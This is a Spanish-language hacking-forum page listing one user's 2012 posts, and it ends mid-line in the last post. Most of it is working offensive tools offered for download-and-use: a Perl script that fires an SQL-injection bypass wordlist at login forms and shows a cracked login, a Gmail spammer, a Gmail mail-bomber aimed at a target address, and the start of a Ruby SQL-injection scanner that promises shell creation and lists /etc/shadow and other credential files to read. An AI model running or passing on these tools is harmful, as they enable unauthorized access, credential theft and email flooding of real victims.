Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - BigBear

Páginas 1 ... 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 ... 55
#371
Scripting / Re: [Perl] ByPass Admin 0.1
14 Marzo 2012, 19:38 PM
es lo que te habia dicho , para que el programa compruebe que realmente paso un bypass tiene tres opciones.

positivo : tenes que poner una porcion del texto que aparece cuando el login fue hecho ej "bienvenido administrador"

negativo : lo mismo que el positivo pero al contrario ej "acceso denegado"

automatico : una mala improvisacion mia , no la uses nunca xD.
#372
Scripting / Re: [Perl] ByPass Admin 0.1
14 Marzo 2012, 16:25 PM
buena pregunta , nunca lo supe xDD.
#373
Scripting / Re: [Perl] ByPass Admin 0.1
14 Marzo 2012, 16:14 PM
explorer ? , este programa nunca hubiera existido si vos no me hubieras ayudado , te pondria en los creditos pero se que estas cosas te disgustan xDD.
#374
Scripting / Re: [Perl] ByPass Admin 0.1
14 Marzo 2012, 14:09 PM
y si , es por eso que le puse 3 opciones para controlar eso (positivo,negativo,automatico).
La unica segura es la primera (positivo) que es cuando aparece (bienvenido admin).

#375
Scripting / [Perl] ByPass Admin 0.1
13 Marzo 2012, 18:50 PM
Acabo de terminar un programa que eh estado haciendo estos ultimos 3 dias , se trata de un script hecho en Perl para realizar los famosos y miticos bypass en los paneles de
administracion , lo bueno es que parsea todos los formularios encontrados en la pagina marcada para que todo sea mas automatico.

El programa depende de un archivo de texto llamado bypass.txt

Código [Seleccionar]

admin'--
'or'1'='1
'or'
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
- ' or 'x'='x
- ' or 'x'='x
'or'1 ou 'or''='
' or 'x'='x
admin' or 1==1
' OR "='
'or'1'='1


El codigo (formateado con perltidy) es

Código (perl) [Seleccionar]

#!usr/bin/perl
#ByPass Admin 0.1
#Coded By Doddy H

use LWP::UserAgent;
use HTML::Form;

my $nave = LWP::UserAgent->new;
$nave->agent(
"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"
);
$nave->timeout(5);

head();
start();
copyright();

sub start {
    print "\n\n[+] Admin : ";
    chomp( my $url = <STDIN> );

    my $code = toma($url);

    my @testar = HTML::Form->parse( $code, "/" );

    $count = 0;
    foreach my $test (@testar) {
        $count++;
        print "\n\n -- == Form $count == --\n\n";
        if ( $test->attr(name) eq "" ) {
            print "[+] Name : No Found" . "\n";
        }
        else {
            print "[+] Name : " . $test->attr(name) . "\n";
        }
        print "[+] Action : " . $test->action . "\n";
        print "[+] Method : " . $test->method . "\n";
        print "\n-- == Input == --\n\n";
        @inputs = $test->inputs;

        foreach $in (@inputs) {

            print "\n[+] Type : " . $in->type . "\n";
            print "[+] Name : " . $in->name . "\n";
            print "[+] Value : " . $in->value . "\n";

        }
    }

    print "\n\n[+] Form to crack : ";
    chomp( my $op = <stdin> );

    print "\n[+] Submit : ";
    chomp( my $aca = <stdin> );

    print "\n[+] Options to check\n\n";
    print "1 - Positive\n";
    print "2 - Negative\n";
    print "3 - Automatic\n\n";
    print "[+] Option : ";
    chomp( my $op2 = <stdin> );

    my @bypass = loadword();

    if ( $op2 eq "1" ) {
        print "\n[+] String : ";
        chomp( my $st = <stdin> );
        print "\n\n[+] Cracking login....\n\n";
        for my $by (@bypass) {
            chomp $by;
            my $code = load( $url, $code, $op, $aca, $by );
            if ( $code =~ /$st/ig ) {
                cracked( $url, $by );
            }
        }
        print "\n[+] Finished\n";
    }

    if ( $op2 eq "2" ) {
        print "\n[+] String : ";
        chomp( my $st = <stdin> );
        print "\n\n[+] Cracking login....\n\n";
        for my $by (@bypass) {
            chomp $by;
            my $code = load( $url, $code, $op, $aca, $by );
            unless ( $code =~ /$st/ig ) {
                cracked( $url, $by );
            }
        }
        print "\n[+] Finished\n";
    }

    if ( $op2 eq "3" ) {
        print "\n\n[+] Cracking login....\n\n";
        my $prueba_falsa = load( $url, $code, $op, $aca, "fuck you" );
        for my $by (@bypass) {
            chomp $by;
            my $code = load( $url, $code, $op, $aca, $by );
            unless ( $code eq $prueba_falsa ) {
                cracked( $url, $by );
            }
        }
        print "\n[+] Finished\n";
    }

}

sub load {

    my ( $url, $code, $op, $aca, $text ) = @_;

    $op--;
    my @probar = ( HTML::Form->parse( $code, "/" ) )[$op];

    for my $testa (@probar) {
        if ( $testa->method eq "POST" ) {

            my @inputs = $testa->inputs;
            for my $in (@inputs) {
                if ( $in->type eq "submit" ) {
                    if ( $in->name eq $aca ) {
                        push( @botones_names,  $in->name );
                        push( @botones_values, $in->value );
                    }
                }
                else {
                    push( @ordenuno, $in->name, $text );
                }
            }

            my @preuno = @ordenuno;
            push( @preuno, $botones_names[0], $botones_values[0] );
            my $codeuno = $nave->post( $url, \@preuno )->content;

            return $codeuno;

        }
        else {

            my $final    = "";
            my $orden    = "";
            my $partedos = "";

            my @inputs = $testa->inputs;
            for my $testa (@inputs) {

                if ( $testa->name eq $aca ) {

                    push( @botones_names,  $testa->name );
                    push( @botones_values, $testa->value );
                }
                else {
                    $orden .= '' . $testa->name . '=' . $text . '&';
                }
            }
            chop($orden);

            my $partedos = "&" . $botones_names[0] . "=" . $botones_values[0];
            my $final    = $url . "?" . $orden . $partedos;

            $codedos = toma($final);
            return $codedos;
        }
    }
}

sub cracked {
    print "[+] Login Cracked\n\n";
    print "[+] URL : $_[0]\n";
    print "[+] Bypass : $_[1]\n";
    savefile( "logs-bypass.txt", "[+] URL : $_[0]" );
    savefile( "logs-bypass.txt", "[+] Bypass : $_[1]\n" );
    copyright();
}

sub loadword {

    my $file = "bypass.txt";

    if ( -f $file ) {

        open( FI, "bypass.txt" );
        my @txts = <FI>;
        close FI;
        chomp @txts;

        return @txts;

    }
    else {
        print "\n\n[-] Wordlist not found\n\n";
        copyright();
    }

}

sub head {
    print qq(

@@@@        @@@@@                       @        @         @     
@   @       @    @                      @        @               
@   @       @    @                     @ @       @               
@   @  @  @ @    @  @@@   @@   @@      @ @    @@@@ @@@ @@  @ @ @@
@@@@   @  @ @@@@@      @ @  @ @  @    @   @  @   @ @  @  @ @ @@  @
@   @  @  @ @       @@@@  @    @      @   @  @   @ @  @  @ @ @   @
@   @  @  @ @      @   @   @    @     @@@@@  @   @ @  @  @ @ @   @
@   @   @@  @      @   @ @  @ @  @   @     @ @   @ @  @  @ @ @   @
@@@@    @   @       @@@@  @@   @@    @     @  @@@@ @  @  @ @ @   @
         @                                                         
       @@                                                         



);
}

sub copyright {
    print "\n\n(C) Doddy Hackman 2012\n\n";
    <stdin>;
    exit(1);
}

sub savefile {
    open( SAVE, ">>" . $_[0] );
    print SAVE $_[1] . "\n";
    close SAVE;
}

sub toma {
    return $nave->get( $_[0] )->content;
}

#The End ?


Un ejemplo de uso

Código [Seleccionar]



@@@@        @@@@@                       @        @         @
@   @       @    @                      @        @
@   @       @    @                     @ @       @
@   @  @  @ @    @  @@@   @@   @@      @ @    @@@@ @@@ @@  @ @ @@
@@@@   @  @ @@@@@      @ @  @ @  @    @   @  @   @ @  @  @ @ @@  @
@   @  @  @ @       @@@@  @    @      @   @  @   @ @  @  @ @ @   @
@   @  @  @ @      @   @   @    @     @@@@@  @   @ @  @  @ @ @   @
@   @   @@  @      @   @ @  @ @  @   @     @ @   @ @  @  @ @ @   @
@@@@    @   @       @@@@  @@   @@    @     @  @@@@ @  @  @ @ @   @
         @
       @@





[+] Admin : http://localhost/labs/bypass/primero.php


-- == Form 1 == --

[+] Name : No Found
[+] Action : /
[+] Method : POST

-- == Input == --


[+] Type : text
[+] Name : usuario
[+] Value :

[+] Type : password
[+] Name : password
[+] Value :

[+] Type : submit
[+] Name : logeo
[+] Value : Entrar


[+] Form to crack : 1

[+] Submit : logeo

[+] Options to check

1 - Positive
2 - Negative
3 - Automatic

[+] Option : 1

[+] String : exitoso


[+] Cracking login....

[+] Login Cracked

[+] URL : http://localhost/labs/bypass/primero.php
[+] Bypass : 'or'1'='1


(C) Doddy Hackman 2012
#376
Scripting / Re: [Perl] DH Spammer 0.1
5 Marzo 2012, 02:04 AM
Cita de: H20-X en  4 Marzo 2012, 19:56 PM
que pena que no sea en py o en rb a mi en perl no me va :-\

al principio tenia pensado hacerlo en Python pero en Perl hay un modulo llamado Email::Send::SMTP::Gmail que me tiene todo el tema de envio de mails resumido.
#377
Scripting / Re: [Perl] DH Spammer 0.1
2 Marzo 2012, 19:23 PM
no se me habia ocurrido eso , gracias por la sugerencia.
#378
Scripting / [Perl] DH Spammer 0.1
1 Marzo 2012, 22:21 PM
Hola a todos , aca les traigo un programa que hice para mandar mails con las siguientes opciones.

  • Mensajes que permitan codigo HTML.
  • Adjuntar archivos
  • Mandar la cantidad que quieran
  • Se maneja con una lista de correos (para poder enviar el mismo mail a varios correos)

    Para usarlo necesitan una cuenta Gmail para indicarle al programa que los mensajes van a ser enviados desde esa cuenta.

    Una imagen del programa


    El codigo (formateado con perltidy) es ...........

    Código (perl) [Seleccionar]

    #!usr/bin/perl
    #DH Spammer 0.1
    #Coded By Doddy H
    #Dependencies
    #http://search.cpan.org/~peco/Email-Send-SMTP-Gmail-0.24/lib/Email/Send/SMTP/Gmail.pm
    #http://search.cpan.org/~cwest/Net-SMTP-SSL-1.01/lib/Net/SMTP/SSL.pm
    #http://search.cpan.org/~sullr/IO-Socket-SSL-1.54/SSL.pm
    #ppm install http://www.open.com.au/radiator/free-downloads/Net-SSLeay.ppd
    #http://search.cpan.org/~gbarr/Authen-SASL-2.15/lib/Authen/SASL.pod
    #Based on http://robertmaldon.blogspot.com/2006/10/sending-email-through-google-smtp-from.html

    use Tk;
    use Tk::ROText;
    use Tk::FileSelect;
    use Email::Send::SMTP::Gmail;
    use Net::SMTP::SSL;
    use Cwd;

    if ( $^O eq 'MSWin32' ) {
        use Win32::Console;
        Win32::Console::Free();
    }

    my $color_fondo = "black";
    my $color_texto = "white";

    my $ve =
      MainWindow->new( -background => $color_fondo, -foreground => $color_texto );
    $ve->geometry("920x560+20+20");
    $ve->resizable( 0, 0 );
    $ve->title("DH Spammer 0.1 (C) Doddy Hackman 2012");

    $d = $ve->Frame(
        -relief     => "sunken",
        -bd         => 1,
        -background => $color_fondo,
        -foreground => $color_texto
    );
    my $ma = $d->Menubutton(
        -text             => "Mails",
        -underline        => 1,
        -background       => $color_fondo,
        -foreground       => $color_texto,
        -activebackground => $color_texto
    )->pack( -side => "left" );
    my $op = $d->Menubutton(
        -text             => "Options",
        -underline        => 1,
        -background       => $color_fondo,
        -foreground       => $color_texto,
        -activebackground => $color_texto
    )->pack( -side => "left" );
    my $ab = $d->Menubutton(
        -text             => "About",
        -underline        => 1,
        -background       => $color_fondo,
        -foreground       => $color_texto,
        -activebackground => $color_texto
    )->pack( -side => "left" );
    my $ex = $d->Menubutton(
        -text             => "Exit",
        -underline        => 1,
        -background       => $color_fondo,
        -foreground       => $color_texto,
        -activebackground => $color_texto
    )->pack( -side => "left" );
    $d->pack( -side => "top", -fill => "x" );

    $ma->command(
        -label      => "Add Mailist",
        -background => $color_fondo,
        -foreground => $color_texto,
        -command    => \&addmailist
    );
    $ma->command(
        -label      => "Add Mail",
        -background => $color_fondo,
        -foreground => $color_texto,
        -command    => \&addmail
    );
    $ma->command(
        -label      => "Clean List",
        -background => $color_fondo,
        -foreground => $color_texto,
        -command    => \&delist
    );

    $op->command(
        -label      => "Spam Now",
        -background => $color_fondo,
        -foreground => $color_texto,
        -command    => \&spamnow
    );
    $op->command(
        -label      => "Add Attachment",
        -background => $color_fondo,
        -foreground => $color_texto,
        -command    => \&addfile
    );
    $op->command(
        -label      => "Clean All",
        -background => $color_fondo,
        -foreground => $color_texto,
        -command    => \&clean
    );

    $ab->command(
        -label      => "About",
        -background => $color_fondo,
        -foreground => $color_texto,
        -command    => \&about
    );
    $ex->command(
        -label      => "Exit",
        -background => $color_fondo,
        -foreground => $color_texto,
        -command    => \&chali
    );

    $ve->Label(
        -text       => "Gmail Login",
        -font       => "Impact3",
        -background => $color_fondo,
        -foreground => $color_texto
    )->place( -x => 100, -y => 40 );

    $ve->Label(
        -text       => "Username : ",
        -background => $color_fondo,
        -foreground => $color_texto
    )->place( -x => 20, -y => 80 );
    my $user = $ve->Entry(
        -width      => 30,
        -text       => 'lagartojuancho@gmail.com',
        -background => $color_fondo,
        -foreground => $color_texto
    )->place( -y => 83, -x => 85 );

    $ve->Label(
        -text       => "Password : ",
        -background => $color_fondo,
        -foreground => $color_texto
    )->place( -x => 20, -y => 120 );
    my $pass = $ve->Entry(
        -show       => "*",
        -width      => 30,
        -text       => 'Secret',
        -background => $color_fondo,
        -foreground => $color_texto
    )->place( -y => 123, -x => 85 );

    $ve->Label(
        -text       => "Message",
        -font       => "Impact3",
        -background => $color_fondo,
        -foreground => $color_texto
    )->place( -x => 110, -y => 160 );

    $ve->Label(
        -text       => "Number : ",
        -background => $color_fondo,
        -foreground => $color_texto
    )->place( -x => 20, -y => 210 );
    my $number = $ve->Entry(
        -width      => 5,
        -text       => "1",
        -background => $color_fondo,
        -foreground => $color_texto
    )->place( -x => 75, -y => 212 );

    $ve->Label(
        -text       => "Attachment : ",
        -background => $color_fondo,
        -foreground => $color_texto
    )->place( -x => 20, -y => 240 );
    my $fi = $ve->Entry(
        -text       => 'None',
        -width      => 30,
        -background => $color_fondo,
        -foreground => $color_texto
    )->place( -x => 90, -y => 242 );

    $ve->Label(
        -text       => "Subject : ",
        -background => $color_fondo,
        -foreground => $color_texto
    )->place( -x => 20, -y => 270 );
    my $tema = $ve->Entry(
        -text       => "Hi idiot",
        -width      => 20,
        -background => $color_fondo,
        -foreground => $color_texto
    )->place( -x => 73, -y => 273 );

    $ve->Label(
        -text       => "Body",
        -font       => "Impact3",
        -background => $color_fondo,
        -foreground => $color_texto
    )->place( -x => 110, -y => 310 );
    my $body = $ve->Scrolled(
        "Text",
        -width      => 30,
        -height     => 12,
        -background => $color_fondo,
        -foreground => $color_texto,
        -scrollbars => "e"
    )->place( -x => 45, -y => 350 );
    $body->insert( "end", "Welcome to the hell" );

    $ve->Label(
        -text       => "Mailist",
        -font       => "Impact3",
        -background => $color_fondo,
        -foreground => $color_texto
    )->place( -y => 40, -x => 400 );
    my $mailist = $ve->Listbox(
        -height     => 31,
        -width      => 33,
        -background => $color_fondo,
        -foreground => $color_texto
    )->place( -y => 85, -x => 330 );

    $ve->Label(
        -text       => "Console",
        -font       => "Impact3",
        -background => $color_fondo,
        -foreground => $color_texto
    )->place( -y => 40, -x => 685 );
    my $console = $ve->Scrolled(
        "ROText",
        -width      => 40,
        -height     => 31,
        -background => $color_fondo,
        -foreground => $color_texto,
        -scrollbars => "e"
    )->place( -x => 580, -y => 84 );

    MainLoop;

    sub addmailist {

        my $adda = MainWindow->new(
            -background => $color_fondo,
            -foreground => $color_texto
        );
        $adda->geometry("400x90+20+20");
        $adda->resizable( 0, 0 );
        $adda->title("Add Mailist");

        $adda->Label(
            -text       => "Mailist : ",
            -background => $color_fondo,
            -foreground => $color_texto,
            -font       => "Impact1"
        )->place( -x => 10, -y => 30 );
        my $en = $adda->Entry(
            -background => $color_fondo,
            -foreground => $color_texto,
            -width      => 33
        )->place( -y => 33, -x => 75 );
        $adda->Button(
            -text             => "Browse",
            -background       => $color_fondo,
            -foreground       => $color_texto,
            -width            => 7,
            -activebackground => $color_texto,
            -command          => \&brona
        )->place( -y => 33, -x => 285 );
        $adda->Button(
            -text             => "Load",
            -background       => $color_fondo,
            -foreground       => $color_texto,
            -width            => 7,
            -activebackground => $color_texto,
            -command          => \&bronaxa
        )->place( -y => 33, -x => 340 );

        sub brona {
            $browse = $adda->FileSelect( -directory => getcwd() );
            my $file = $browse->Show;
            $en->configure( -text => $file );
        }

        sub bronaxa {
            open( FILE, $en->get );
            @words = <FILE>;
            close FILE;

            for (@words) {
                $mailist->insert( "end", $_ );
            }
        }
    }

    sub addfile {

        my $addax = MainWindow->new(
            -background => $color_fondo,
            -foreground => $color_texto
        );
        $addax->geometry("390x90+20+20");
        $addax->resizable( 0, 0 );
        $addax->title("Add File");

        $addax->Label(
            -text       => "File : ",
            -background => $color_fondo,
            -foreground => $color_texto,
            -font       => "Impact1"
        )->place( -x => 10, -y => 30 );
        my $enaf = $addax->Entry(
            -background => $color_fondo,
            -foreground => $color_texto,
            -width      => 33
        )->place( -y => 33, -x => 55 );
        $addax->Button(
            -text             => "Browse",
            -background       => $color_fondo,
            -foreground       => $color_texto,
            -width            => 7,
            -activebackground => $color_texto,
            -command          => \&bronax
        )->place( -y => 33, -x => 265 );
        $addax->Button(
            -text             => "Load",
            -background       => $color_fondo,
            -foreground       => $color_texto,
            -width            => 7,
            -activebackground => $color_texto,
            -command          => \&bronaxx
        )->place( -y => 33, -x => 320 );

        sub bronax {
            $browse = $addax->FileSelect( -directory => getcwd() );
            my $filea = $browse->Show;
            $enaf->configure( -text => $filea );
        }

        sub bronaxx {
            $fi->configure( -text => $enaf->get );
        }
    }

    sub addmail {

        my $add = MainWindow->new(
            -background => $color_fondo,
            -foreground => $color_texto
        );
        $add->geometry("350x90+20+20");
        $add->resizable( 0, 0 );
        $add->title("Add Mail");

        $add->Label(
            -text       => "Mail : ",
            -background => $color_fondo,
            -foreground => $color_texto,
            -font       => "Impact1"
        )->place( -x => 10, -y => 30 );
        my $ew = $add->Entry(
            -background => $color_fondo,
            -foreground => $color_texto,
            -width      => 33
        )->place( -y => 33, -x => 60 );
        $add->Button(
            -text             => "Add",
            -background       => $color_fondo,
            -activebackground => $color_texto,
            -foreground       => $color_texto,
            -width            => 7,
            -command          => \&addnow
        )->place( -y => 33, -x => 275 );

        sub addnow {
            $mailist->insert( "end", $ew->get );
        }

    }

    sub delist {
        $mailist->delete( 0.0, "end" );
    }

    sub spamnow {

        $console->delete( 0.1, "end" );

        my $control = "0";

        my $msg = Net::SMTP::SSL->new( "smtp.gmail.com", Port => 465 );
        if ( $msg->auth( $user->get, $pass->get ) ) {
            $control = "1";
        }
        else {
            $control = "0";
        }
        $msg->quit();

        if ($control) {

            $console->insert( "end", "[+] Starting the Party\n\n" );

            my @mails = $mailist->get( "0.0", "end" );
            chomp @mails;
            for my $mail (@mails) {
                $ve->update;
                $console->insert( "end", "[+] Mail : $mail\n" );

                my $text = $body->get( "1.0", "end" );

                if ( $fi->get eq "None" ) {
                    singlemail( $user->get, $pass->get, $mail, $tema->get, $text,
                        $number->get );
                }
                else {
                    singlemailwithfile( $user->get, $pass->get, $mail, $tema->get,
                        $text, $fi->get, $number->get );
                }
            }
            $console->insert( "end", "\n\n[+] Finished" );
        }
        else {
            $console->insert( "end", "[-] Bad Login\n" );
        }
    }

    sub singlemail {

        my ( $user, $password, $target, $asunto, $mensaje, $cantidad ) = @_;

        for ( 1 .. $cantidad ) {
            my $msg = Net::SMTP::SSL->new( "smtp.gmail.com", Port => 465 );
            $msg->auth( $user, $password );
            $msg->mail( $user . "\n" );
            $msg->to( $target . "\n" );
            $msg->data();
            $msg->datasend( "From: " . $user . "\n" );
            $msg->datasend( "To: " . $target . "\n" );
            $msg->datasend( "Subject: " . $asunto . "\n" );
            $msg->datasend("Content-Type: text/html \n");
            $msg->datasend("\n");
            $msg->datasend( $mensaje . "\n" );
            $msg->dataend();
            $msg->quit();
        }
    }

    sub singlemailwithfile {

        my ( $user, $password, $target, $asunto, $mensaje, $file, $cantidad ) = @_;

        my $mail = Email::Send::SMTP::Gmail->new(
            -smtp  => "gmail.com",
            -login => $user,
            -pass  => $password
        );
        for my $number ( 1 .. $cantidad ) {
            $mail->send(
                -to          => $target,
                -subject     => $asunto,
                -body        => $mensaje,
                -attachments => $file
            );
        }
        $mail->bye;
    }

    sub clean {

        $user->configure( -text => " " );
        $pass->configure( -text => " " );
        $number->configure( -text => " " );
        $fi->configure( -text => "None" );
        $tema->configure( -text => " " );
        $body->delete( 0.1, "end" );
        $mailist->delete( 0.0, "end" );
        $console->delete( 0.1, "end" );

    }

    sub about {
        $about = MainWindow->new( -background => "black" );
        $about->title("About");
        $about->geometry("300x110");
        $about->resizable( 0, 0 );
        $about->Label( -background => "black", -foreground => "white" )->pack();
        $about->Label(
            -text       => "Contact : lepuke[at]hotmail[com]",
            -font       => "Impact",
            -background => "black",
            -foreground => "white"
        )->pack();
        $about->Label(
            -text       => "Web : doddyhackman.webcindario.com",
            -font       => "Impact",
            -background => "black",
            -foreground => "white"
        )->pack();
        $about->Label(
            -text       => "Blog : doddy-hackman.blogspot.com",
            -font       => "Impact",
            -background => "black",
            -foreground => "white"
        )->pack();
    }

    sub chali { exit(1); }

    #The End ?

#379
Scripting / [Perl] Gmail Bomber 0.3
23 Febrero 2012, 17:39 PM
Hola a todos , aca les traigo un gmail bomber que hice para el torneo de programacion de HackXCrack , se trata de un simple mail bomber para Gmail , aca les dejo una imagen del programa en uso donde me envio 40 mensajes a mi cuenta


Y mi casilla quedo asi


El codigo del programa (formateado con perltidy) es

Código (perl) [Seleccionar]

#!usr/bin/perl
#Gmail Bomber 0.2
#Dependencies
#http://search.cpan.org/~peco/Email-Send-SMTP-Gmail-0.24/lib/Email/Send/SMTP/Gmail.pm
#http://search.cpan.org/~cwest/Net-SMTP-SSL-1.01/lib/Net/SMTP/SSL.pm
#http://search.cpan.org/~sullr/IO-Socket-SSL-1.54/SSL.pm
#ppm install http://www.open.com.au/radiator/free-downloads/Net-SSLeay.ppd
#http://search.cpan.org/~gbarr/Authen-SASL-2.15/lib/Authen/SASL.pod

use Tk;
use Win32;
use Email::Send::SMTP::Gmail;

if ( $^O eq 'MSWin32' ) {
    use Win32::Console;
    Win32::Console::Free();
}

my $color_fondo = "black";
my $color_texto = "green";

my $ve =
  MainWindow->new( -background => $color_fondo, -foreground => $color_texto );
$ve->geometry("300x600+20+20");
$ve->resizable( 0, 0 );
$ve->title("Gmail Bomber 0.2");

$ve->Label(
    -text       => "Login",
    -font       => "Impact3",
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 110, -y => 30 );

$ve->Label(
    -text       => "Username : ",
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 20, -y => 80 );
my $user = $ve->Entry(
    -width      => 30,
    -text       => 'lagartojuancho@gmail.com',
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -y => 83, -x => 85 );

$ve->Label(
    -text       => "Password : ",
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 20, -y => 120 );
my $pass = $ve->Entry(
    -show       => "*",
    -width      => 30,
    -text       => 'Secret',
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -y => 123, -x => 85 );

$ve->Label(
    -text       => "Message",
    -font       => "Impact3",
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 110, -y => 160 );

$ve->Label(
    -text       => "Number : ",
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 20, -y => 210 );
my $number = $ve->Entry(
    -width      => 5,
    -text       => "20",
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 75, -y => 212 );

$ve->Label(
    -text       => "Target : ",
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 20, -y => 240 );
my $to = $ve->Entry(
    -text       => 'idiot@gmail.com',
    -width      => 30,
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 73, -y => 242 );

$ve->Label(
    -text       => "Subject : ",
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 20, -y => 270 );
my $tema = $ve->Entry(
    -text       => "Hi idiot",
    -width      => 20,
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 73, -y => 273 );

$ve->Label(
    -text       => "Body",
    -font       => "Impact3",
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 110, -y => 310 );
my $body = $ve->Text(
    -width      => 30,
    -height     => 12,
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 45, -y => 350 );
$body->insert( "end", "Welcome to the hell" );

$ve->Button(
    -text             => "Send",
    -width            => 10,
    -command          => \&start,
    -background       => $color_fondo,
    -foreground       => $color_texto,
    -activebackground => $color_texto
)->place( -x => 43, -y => 550 );
$ve->Button(
    -text             => "About",
    -width            => 10,
    -command          => \&about,
    -background       => $color_fondo,
    -foreground       => $color_texto,
    -activebackground => $color_texto
)->place( -x => 117, -y => 550 );
$ve->Button(
    -text             => "Exit",
    -width            => 10,
    -command          => [ $ve => "destroy" ],
    -background       => $color_fondo,
    -foreground       => $color_texto,
    -activebackground => $color_texto
)->place( -x => 190, -y => 550 );

MainLoop;

sub start {

    $text = $body->get( "1.0", "end" );
    chomp $text;

    if (
        my $mail = Email::Send::SMTP::Gmail->new(
            -smtp  => "gmail.com",
            -login => $user->get,
            -pass  => $pass->get
        )
      )
    {

        for my $number ( 1 .. $number->get ) {
            $ve->update;
            $mail->send(
                -to      => $to->get,
                -subject => $tema->get,
                -body    => $text
            );
        }

        Win32::MsgBox( "Send", 0, "Mails Send" );

        $mail->bye;

    }
    else {
        Win32::MsgBox( "Error in the login", 0, "Error" );
    }
}

sub about {

    my $text =
"This program was written by Doddy H for the Tournament of Programming Perl
to forum HackxCrack";

    Win32::MsgBox( $text, 0, "About" );

}

#The End ?
#380
Scripting / [Ruby] k0bra 0.3
16 Febrero 2012, 18:16 PM
Un simple scanner SQLI con las siguientes funciones


  • Comprobar vulnerabilidad
  • Buscar numero de columnas
  • Buscar automaticamente el numero para mostrar datos
  • Mostras tablas
  • Mostrar columnas
  • Mostrar bases de datos
  • Mostrar tablas de otra DB
  • Mostrar columnas de una tabla de otra DB
  • Mostrar usuarios de mysql.user
  • Buscar archivos usando load_file
  • Mostrar un archivo usando load_file
  • Mostrar valores
  • Mostrar informacion sobre la DB
  • Crear una shell usando outfile
  • Todo se guarda en logs ordenados


    Código (ruby) [Seleccionar]

    #!usr/bin/ruby
    #K0bra 0.3
    #Coded By Doddy H

    require "net/http"

    $files = ['C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/admin.php','C:/xampp/htdocs/leer.txt','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf.default','C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf','C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf','C:\ProgramFiles\xampp\apache\conf